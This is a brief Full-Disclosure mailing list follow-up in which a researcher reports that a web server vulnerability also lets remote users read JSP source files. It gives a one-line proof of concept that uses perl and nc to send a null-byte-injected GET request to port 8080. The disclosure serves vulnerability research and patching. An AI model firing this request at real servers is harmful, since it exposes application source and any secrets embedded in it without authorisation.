One more thing: the vulnerability also allows remote users to retrieve source of JSP files in this way:
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080 -- Jouko Pynnonen Online Solutions Ltd Secure your Linux - [EMAIL PROTECTED] http://www.solutions.fi http://www.secmod.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
